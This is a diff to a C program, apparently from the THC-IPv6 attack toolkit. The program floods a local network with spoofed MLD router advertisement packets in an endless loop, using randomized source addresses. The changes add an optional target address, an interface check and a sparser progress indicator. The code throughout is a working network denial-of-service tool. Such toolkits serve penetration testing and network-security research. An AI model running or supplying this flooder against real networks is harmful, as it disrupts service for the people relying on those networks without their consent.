@@ -11,8 +11,8 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s interface\n\n", prg);
+  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s interface [target]\n\n", prg);
   printf("Flood the local network with MLD router advertisements.\n");
 //  printf("Use -r to use raw mode.\n\n");
   exit(-1);
@@ -22,14 +22,14 @@ int main(int argc, char *argv[]) {
   char *interface, mac[6] = "";
   unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
   unsigned char buf[6];
-  unsigned char *dst = thc_resolve6("ff02:0:0:0:0:0:0:6a"), *dstmac = thc_get_multicast_mac(dst);
+  unsigned char *dst = thc_resolve6("ff02::6a"), *dstmac = thc_get_multicast_mac(dst);
   int i;
   unsigned char *pkt = NULL;
   int pkt_len = 0;
   int rawmode = 0;
   int count = 0;
 
-  if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0)
+  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
     help(argv[0]);
 
   if (strcmp(argv[1], "-r") == 0) {
@@ -43,13 +43,22 @@ int main(int argc, char *argv[]) {
   setvbuf(stdout, NULL, _IONBF, 0);
 
   interface = argv[1];
+  if (thc_get_own_mac(interface) == NULL) {
+    fprintf(stderr, "Error: invalid interface %s\n", interface);
+    exit(-1);
+  }
+  if (argc > 2)
+    if ((dst = thc_resolve6(argv[2])) == NULL) {
+      fprintf(stderr, "Error: can not resolve %s\n", argv[2]);
+      exit(-1);
+    }
 
   memset(buf, 0, sizeof(buf));
   mac[0] = 0x00;
   mac[1] = 0x18;
   ip6[9] = mac[1];
 
-  printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
+  printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
   while (1) {
 
     for (i = 0; i < 4; i++)
@@ -62,7 +71,7 @@ int main(int argc, char *argv[]) {
     ip6[15] = mac[5];
     count++;
 
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
       return -1;
     if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_ROUTERADV, 15, 0x00300006, buf, 0, 0) < 0)
       return -1;
@@ -75,7 +84,7 @@ int main(int argc, char *argv[]) {
 
     pkt = thc_destroy_packet(pkt);
 //    usleep(1);
-    if (count % 100 == 0)
+    if (count % 1000 == 0)
       printf(".");
   }
   return 0;
